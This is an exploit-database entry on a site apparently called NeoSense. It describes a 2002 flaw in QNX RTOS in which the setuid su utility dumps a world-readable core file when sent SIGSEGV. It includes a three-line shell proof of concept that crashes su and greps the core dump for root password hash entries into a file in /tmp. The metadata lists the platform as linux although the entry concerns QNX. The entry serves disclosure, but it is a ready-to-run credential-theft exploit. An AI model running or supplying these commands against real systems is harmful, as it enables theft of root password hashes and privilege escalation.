[] NeoSense
E X P L O I T S
title author type platform port cve id

QNX RTOS 4.25/6.1 - su Password Hash Disclosure

Author: badc0ded
type: local
platform: linux
port: 
date_added: 2002-06-03 
date_updated: 2012-09-23 
verified: 1 
codes: CVE-2002-2039;OSVDB-56495 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/4914/info

It has been reported that the 'su' utility for QNX RTOS accepts the SIGSEGV signal and dumps a world readable core file. An attacker is able to analyze the core file and obtain very sensitive information.

It is very probable that this is a kernel-based vulnerability affecting not only 'su', but other setuid programs as well

$su > /dev/null &
$kill -SEGV `ps -A | grep su | awk {'print $1'}`
$strings /var/dumps/su.core | grep ":0:0" > /tmp/mypasswd

The attacker has effectively obtained a copy of the root user's password hash.
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.